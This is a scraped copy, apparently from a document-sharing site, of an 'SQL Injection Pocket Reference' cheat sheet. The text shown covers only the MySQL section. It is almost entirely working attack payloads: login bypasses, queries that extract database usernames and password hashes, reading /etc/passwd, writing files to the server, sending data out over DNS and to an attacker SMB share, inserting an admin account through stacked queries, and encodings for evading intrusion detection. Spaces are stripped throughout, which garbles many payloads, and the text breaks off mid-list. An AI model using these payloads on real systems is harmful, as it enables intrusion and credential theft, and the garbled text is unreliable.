SQL Injection Pocket Reference.docx
- 文档编号:4776772
- 上传时间:2022-12-08
- 格式:DOCX
- 页数:26
- 大小:26.38KB
SQL Injection Pocket Reference.docx
《SQL Injection Pocket Reference.docx》由会员分享,可在线阅读,更多相关《SQL Injection Pocket Reference.docx(26页珍藏版)》请在冰豆网上搜索。
SQLInjectionPocketReference
SQLInjectionPocketReference
1.MySQL
a.DefaultDatabases
b.CommentOutQuery
c.TestingInjection
i.Strings
ii.Numeric
iii.Inalogin
d.TestingVersion
e.MySQL-specificcode
f.RetrievingDBusernames/passwords
g.Tables&Columns
i.Findingoutcolumn#
ii.RetrievingTables
iii.RetrievingColumns
iv.PROCEDUREANALYSE()
v.FindTablesfromColumnName
vi.FindColumnFromTableName
h.Avoidingtheuseofsingle/doublequotations
i.Stringconcatenation
j.Privileges
k.FILEprivilege
i.MySQL4/5
ii.MySQL5
l.OutOfBandChanneling
i.Timing
ii.DNS(requiresFILEprivilege)
iii.SMB(requiresFILEprivilege)
m.ReadingFiles(requiresFILEprivilege)
n.WritingFiles(requiresFILEprivilege)
o.StackedQuerieswithPDO
p.UserDefinedFunctions
q.FuzzingandObfuscation
i.AllowedIntermediaryCharacters:
ii.AllowedIntermediaryCharactersafterAND/OR
r.Operators
s.Constants
t.MySQLFunctions()
u.MySQLPasswordHashing(TakenfromMySQLwebsite)
v.MySQLPassword()Cracker
w.MySQL<4.1PasswordCracker
2.MSSQL
a.DefaultDatabases
b.CommentOutQuery
c.TestingVersion
d.Retrievingusernames/passwords
e.DatabaseServerHostname
f.ListingDatabases
g.Tables&Columns
i.RetrievingTables
ii.RetrievingColumns
iii.RetrievingMultipleTables/Columnsatonce
h.OPENROWSETAttacks
i.SystemCommandExecution
j.SP_PASSWORD(HidingQuery)
k.FuzzingandObfuscation
i.Encodings
l.MSSQLPasswordHashing
m.MSSQLPasswordCracker
3.ORACLE
a.DefaultDatabases
b.CommentOutQuery
c.TestingVersion
d.RetrievingUsers/Passwords
e.RetrievingDatabases
i.CurrentDatabase
ii.UserDatabases
f.Tables&Columns
i.RetrievingTables
ii.RetrievingColumns
iii.FindingTablesfromColumnName
iv.FindingColumnFromTableName
g.FuzzingandObfuscation
i.Avoidingtheuseofsingle/doublequotations
ii.UnlikeotherRDBMS,Oracleallowsustoreferencetable/columnnamesencoded.
h.OutOfBandChanneling
i.TimeDelay
ii.HeavyQueryTimedelays
Credits
Iwouldliketothank.mario,Reinersandeveryoneelsewhohelpmeputthistogether.Youcanreachmeatforanysuggestionsyoumayhaveorifthere'ssomethingyouthinkshouldbeonhere.Rememberthisisstillaworkinprogress.
MySQL
DefaultDatabases
∙mysql(Privileged)
∙information_schema(Version>=5)
CommentOutQuery
∙#
∙/*
∙---
∙;%00
Example:
'OR1=1---'ORDERBYid;
TestingInjection
∙False
oThequeryisinvalid(MySQLerrors/missingcontentonwebsite)
∙True
oThequeryisvalid(Contentisdisplayedasusual)
Strings
∙' - False
∙''- True
∙" - False
∙""- True
Numeric
∙AND0-False
∙AND1-True
∙2-1 -1
∙3-2 -1
Inalogin
∙'OR'1
∙'OR1---
∙'='
∙'like'
∙'=0---
Example:
∙SELECT*FROMUsersWHEREusername='Mike'ANDpassword=''=''
∙"OR""="
∙"OR1=1---
Example:
SELECT*FROMUsersWHEREusername='Mike'ANDpassword='anypassword'OR''=''
Note:
∙Youcanuseasmanyapostrophes/quotationsasyouwantaslongastheypairup
∙SELECT*FROMArticlesWHEREid='121'''''''''''''' -Thisisvalid
∙It'salsopossibletocontinuethestatementafterthechainofquotes:
SELECT'1'''''''""UNIONSELECT2#1and2
∙Quotesescapequotes:
SELECT'1'''#1'
TestingVersion
∙VERSION();
∙@@VERSION;
Example:
'ANDMID(VERSION(),1,1)='5 -TrueifMySQLversionis5
MySQL-specificcode
MySQLallowsyoutospecifytheversionnumberaftertheexclamationmark.Thesyntaxwithinthecommentisonlyexecutediftheversionisgreaterorequaltothespecifiedversionnumber.
Example:
UNIONSELECT/*!
500005,null;%00x%A0*//*!
400004,null--,*//*!
300003,null--x*/,null---(UNIONwith2columns)
Note:
∙Youcanusecommentsinbetweenthenameandtheparenthesis
∙Example:
VERSION/**/()
∙Outputwillcontain-nt-logincasetheDBMSrunsonaWindowsbasedmachine
RetrievingDBusernames/passwords
∙Database.Table:
mysql.user(Privileged)
∙Columns:
user,password
∙CurrentUser:
user(),system_user()
Example:
∙UNIONSELECTCONCAT(user,0x3A,password)FROMmysql.userWHEREuser='root'
Tables&Columns
Findingoutcolumn#
∙OrderBy:
oORDERBY1
oORDERBY2
oORDERBY...
Note:
KeepincrementingthenumberuntilyougetaFalseresponse.
Example:
∙1'ORDERBY1---True
∙1'ORDERBY2--- True
∙1'ORDERBY3--- True
∙1'ORDERBY4--- False(Only3Columns)
∙-1'UNIONSELECT1,2,3---
∙ErrorBased:
oAND(SELECT*FROMSOME_TABLE)=1
oOperandshouldcontain3column(s)
Note:
Thisworksifyouknowthetablenameyou'reafteranderrorshowingisenabled
RetrievingTables
∙Union:
oUNIONSELECTGROUP_CONCAT(table_name)FROMinformation_schema.tablesWHEREversion=10;
∙Blind:
oANDSELECTSUBSTR(table_name,1,1)FROMinformation_schema.tables>'A'
∙Error:
AND(SELECTCOUNT(*)FROM(SELECT1UNIONSELECTnullUNIONSELECT!
1)xGROUPBYCONCAT((SELECTtable_nameFROMinformation_schema.tablesLIMIT1),FLOOR(RAND(0)*2)))
Note:
∙version=9forMySQL4
∙version=10forMySQL5
RetrievingColumns
∙Union:
oUNIONSELECTGROUP_CONCAT(column_name)FROMinformation_schema.columnsWHEREtable_name='tablename'
∙Blind:
oANDSELECTSUBSTR(column_name,1,1)FROMinformation_schema.columns >'A'
Error:
AND(SELECTCOUNT(*)FROM(SELECT1UNIONSELECTnullUNIONSELECT!
1)xGROUPBYCONCAT((SELECTcolumn_nameFROMinformation_schema.columnsLIMIT1),FLOOR(RAND(0)*2)))
oAND(1,2,3)=(SELECT*FROMSOME_TABLEUNIONSELECT1,2,3LIMIT1)--FixedinMySQL5.1
∙ProcedureAnalyse():
oRefertoPROCEDUREANALYSE()below.
Note:
TheGROUP_CONCAT()functionallowsgroupingofthetables/columns,insteadofviewingthemoneatatime.
Note:
∙Outputislimitedto1024charsbydefault.
∙Alldefaultdatabasetablenames:
~900chars
∙Alldefaultdatabasecolumnnames:
~6000chars
PROCEDUREANALYSE()
∙1PROCEDUREANALYSE()#getfirstcolumnname
∙1LIMIT1,1PROCEDUREANALYSE()#getsecondcolumnname
∙1LIMIT2,1PROCEDUREANALYSE()#getthirdcolumnname
Note:
ItisnecessarythatthewebappwilldisplaythefirstselectedcolumnoftheSQLqueryyouareinjectingto.
FindTablesfromColumnName
∙SELECTtable_nameFROMinformation_schema.columnsWHEREcolumn_name='username';-Findsthetablenamesforanycolumnsnamedusername.
∙SELECTtable_nameFROMinformation_schema.columnsWHEREcolumn_nameLIKE'%user%';-Findsthetablenamesforanycolumnsthatcontaintheworduser.
FindColumnFromTableName
∙SELECTcolumn_nameFROMinformation_schema.columnsWHEREtable_name='Users';
∙SELECTcolumn_nameFROMinformation_schema.columnsWHEREtable_nameLIKE'%user%';
Avoidingtheuseofsingle/doublequotations
∙UNIONSELECTCONCAT(username,0x3a,password)FROMUsersWHEREusername=0x61646D696E
∙UNIONSELECTCONCAT(username,0x3a,password)FROMUsersWHEREusername= CHAR(97,100,109,105,110)
Stringconcatenation
∙SELECTconcat('a','a','a')
∙SELECT'a''a''a'a
∙SELECT/*/'a'/*/'d'/*/'mi'/*/'n'
Privileges
FILEprivilege
MySQL4/5
∙'UNIONSELECTfile_priv,nullFROMmysql.userWHEREuser='username
∙'ANDMID((SELECTfile_privFROMmysql.userWHEREuser='username'),1,1)='Y
MySQL5
∙'UNIONSELECTgrantee,is_grantableFROMinformation_schema.user_privilegesWHEREprivilege_type='file'ANDgranteelike'%username%
∙'ANDMID((SELECTis_grantableFROMinformation_schema.user_privilegesWHEREprivilege_type='file'ANDgranteelike'%username%'),1,1)='Y
OutOfBandChanneling
Timing
∙BENCHMARK()
∙SLEEP() (MySQL5)
∙IF(),(CASE()WHEN)
∙'-(IF(MID(version(),1,1)LIKE5,BENCHMARK(100000,SHA1('test')),false))-'
DNS(requiresFILEprivilege)
∙SELECTLOAD_FILE(concat('\\\\foo.',(selectMID(version(),1,1)),'\\'));
SMB(requiresFILEprivilege)
∙'OR1=1INTOOUTFILE'\\\\attacker\\SMBshare\\output.txt
ReadingFiles(requiresFILEprivilege)
∙LOAD_FILE()
∙UNIONSELECTLOAD_FILE('/etc/passwd')---
Note:
∙filemustbelocatedontheserverhost
∙thebasedirectoryforload_file()isthe @@datadir
∙thefilemustbereadablebytheMySQLuser
∙thefilesizemustbelessthanmax_allowed_packet
∙UNIONSELECT@@max_allowed_packet (defaultvalueis1047552Byte)
WritingFiles(requiresFILEprivilege)
∙INTOOUTFILE/DUMPFILE
∙AND1=0UNIONSELECT'code',nullINTOOUTFILE'/tmp/file
Note:
∙youcan’toverwritefileswithINTOOUTFILE
∙INTOOUTFILEmustbethelaststatementinthequery
∙thereisnowaytoencodethepathname,soquotesarerequired
StackedQuerieswithPDO
StackedqueriesarepossiblewhenPHPusesthePDO_MYSQLdrivertomakeaconnectiontothedatabase.
Example:
∙AND1=0;INSERTINTOUsers(username,password,priv)VALUES('BobbyTables','kl20da$$','admin');
UserDefinedFunctions
FuzzingandObfuscation
AllowedIntermediaryCharacters:
∙09
∙10
∙0A
∙0B
∙0C
∙0D
∙A0
Example:
'%0A%09UNION%0CSELECT%10NULL%23
∙28
∙29
Example:
union(select(column)from(table))
Note:
URLEncodingyourinjectioncansometimesbeusefulforIDSevasion.
%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31
AllowedIntermediaryCharactersafterAND/OR
∙2B
∙2D
∙7E
Example:
SELECT1FROMTestWHERE1=1AND-+-+-+-+~~(
(1))
$prefixes=array("","+","-","~","!
","@","");
∙09
∙0A
∙0B
∙0D
∙0C
∙20
Example:
SELECT1FROMinformation_schema%20%0C%20.%20%09tables;
Operators
$operators=array("^","=","!
=","%","/","*",
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- SQL Injection Pocket Reference